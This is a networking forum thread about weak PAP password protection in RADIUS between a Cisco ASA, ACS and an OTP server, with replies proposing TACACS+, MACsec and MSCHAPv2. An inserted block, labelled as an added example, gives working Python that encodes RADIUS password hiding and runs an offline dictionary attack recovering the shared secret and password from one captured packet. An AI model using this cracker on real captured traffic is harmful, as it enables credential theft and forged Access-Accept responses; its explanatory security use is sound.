[OTP] How can we protect password in RADIUS packets?

Patrick Tran
Level 1

Hi,

I use this architecture:

Client --- ASA 9.1 --- ACS 5.4 (RADIUS) --- OTP Server (RADIUS)

  • Client connects with login/OTP.
  • ASA transmits Access-Request and credentials to ACS 5.4 using PAP protocol
  • ACS 5.4 transmits Access-Request and credentials to OTP Server using PAP protocol.

With the PAP protocol, the password is only secured by RADIUS (hash and XOR with the shared secret).

How could I get a stronger encryption?

Thanks for your help,

Patrick
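As an added example that is not part of the original thread, the following Python implements the RADIUS User-Password hiding that the question refers to (RFC 2865, section 5.2: MD5 of the shared secret and Request Authenticator, XORed with the NUL-padded password, chained per 16-octet block), wraps it in a minimal Access-Request encoder/parser, and then runs an offline dictionary attack against a single captured packet to show what "only secured by RADIUS" means in practice. The shared secret, Request Authenticator, username, OTP value and wordlist are all constructed for the example; none of it is Cisco code or taken from a real deployment.

```python
"""RADIUS User-Password hiding (RFC 2865 section 5.2) and an offline attack on it.

Added example; not code from the original post or from Cisco.
Every value below (secret, authenticator, username, OTP, wordlist) is constructed.
"""
import hashlib
import os
import struct
from typing import Optional, Tuple

RADIUS_ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2


def hide_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Obfuscate a PAP password the way a RADIUS client does for User-Password.

    The password is NUL-padded to a multiple of 16 octets; block i is XORed with
    MD5(secret || previous hidden block), where the "previous block" for the first
    block is the 16-octet Request Authenticator.  MD5 acts as a keystream
    generator here, not as an integrity check: nothing authenticates the value.
    """
    if len(authenticator) != 16:
        raise ValueError("Request Authenticator must be 16 octets")
    if not 1 <= len(password) <= 128:
        raise ValueError("RFC 2865 limits User-Password to 1..128 octets")
    padded = password + b"\x00" * (-len(password) % 16)
    hidden = bytearray()
    prev = authenticator
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        hidden += block
        prev = block  # chaining: each later keystream depends on the previous hidden block
    return bytes(hidden)


def reveal_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Server-side inverse of hide_password(); strips the NUL padding."""
    if not hidden or len(hidden) % 16:
        raise ValueError("hidden password must be a non-empty multiple of 16 octets")
    plain = bytearray()
    prev = authenticator
    for i in range(0, len(hidden), 16):
        block = hidden[i:i + 16]
        keystream = hashlib.md5(secret + prev).digest()
        plain += bytes(c ^ k for c, k in zip(block, keystream))
        prev = block
    return bytes(plain).rstrip(b"\x00")


def build_access_request(identifier: int, username: bytes, password: bytes,
                         secret: bytes, authenticator: Optional[bytes] = None) -> bytes:
    """Encode a minimal Access-Request (Code 1) carrying User-Name and a hidden
    User-Password, i.e. what the ASA sends to ACS (and ACS to the OTP server) for PAP."""
    if authenticator is None:
        authenticator = os.urandom(16)  # must be unpredictable and unique per request
    hidden = hide_password(password, secret, authenticator)
    attrs = (struct.pack("!BB", ATTR_USER_NAME, 2 + len(username)) + username
             + struct.pack("!BB", ATTR_USER_PASSWORD, 2 + len(hidden)) + hidden)
    header = struct.pack("!BBH", RADIUS_ACCESS_REQUEST, identifier, 20 + len(attrs))
    return header + authenticator + attrs


def parse_access_request(packet: bytes):
    """Return (code, identifier, authenticator, {attr_type: value}) for a RADIUS packet."""
    code, identifier, length = struct.unpack("!BBH", packet[:4])
    authenticator = packet[4:20]
    attrs, pos = {}, 20
    while pos + 2 <= length:
        atype, alen = packet[pos], packet[pos + 1]
        if alen < 2:
            raise ValueError("malformed attribute length")
        attrs[atype] = packet[pos + 2:pos + alen]
        pos += alen
    return code, identifier, authenticator, attrs


def crack_shared_secret(packet: bytes, wordlist) -> Optional[Tuple[bytes, bytes]]:
    """Offline dictionary attack on the shared secret from ONE captured Access-Request.

    A guessed secret can be verified without knowing the password: the real
    plaintext is printable text followed by NUL padding, a wrong guess yields
    random octets.  (A password containing non-printable bytes would be missed.)
    Returns (secret, password) on success, None otherwise.
    """
    _, _, authenticator, attrs = parse_access_request(packet)
    hidden = attrs[ATTR_USER_PASSWORD]
    for guess in wordlist:
        candidate = reveal_password(hidden, guess, authenticator)
        if candidate and all(0x20 <= b < 0x7F for b in candidate):
            return guess, candidate
    return None


if __name__ == "__main__":
    SECRET = b"cisco123"  # constructed weak shared secret
    captured = build_access_request(7, b"ptran", b"482913", SECRET)  # OTP sent as PAP password
    print("hidden User-Password:", parse_access_request(captured)[3][ATTR_USER_PASSWORD].hex())
    print("dictionary attack:", crack_shared_secret(captured, [b"radius", b"cisco", b"cisco123"]))
```

Two things this makes concrete for the architecture in the question. First, the OTP value itself is short-lived, but the shared secret recovered from one captured Access-Request is not: it unlocks every subsequent User-Password on that hop and lets an attacker forge Access-Accept responses. Second, the ASA-to-ACS and ACS-to-OTP hops each use their own secret and are independently exposed, so hardening one of them (a strong, long, random secret; a transport such as IPsec or, as suggested below, MACsec) does nothing for the other.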

4 Replies

Marvin Rhoads
Hall of Fame

Switch to TACACS+ with a strong encryption key.

If you're really interested in security without changing the use of the RADIUS protocol, you could secure the packets in transit with MACsec (assuming the intervening network supports it).

Thanks for your answer, Marvin.

Unfortunately, the OTP Server doesn't support TACACS, so this solution would solve half of the problem.

MACsec is complicated to configure in our environment... (hundreds of switches and routers...)

Patrick,

AFAIU password-management will allow you to use MSCHAPv2. I have not been checking this for a while, but I found some articles, e.g.

http://www.islandearth.com/articles/2013/5/2/mschap-v2-for-cisco-asa-vpn-connections-using-radius-on-wind.html

that seem to confirm this.

This will take care of the path ASA -> ACS. Now, to be honest, I'm not sure what will happen when you need to "proxy" the auth to another server.

M.

Hi Marcin,

Thanks for your advice.

I already tried to enable mschapv2.

Unfortunately, ACS doesn't support MSCHAPv2 with other RADIUS servers:

http://www.cisco.com/en/US/docs/net_mgmt/cisco_secure_access_control_system/5.2/user/guide/eap_pap_phase.html#wp1014889

Patrick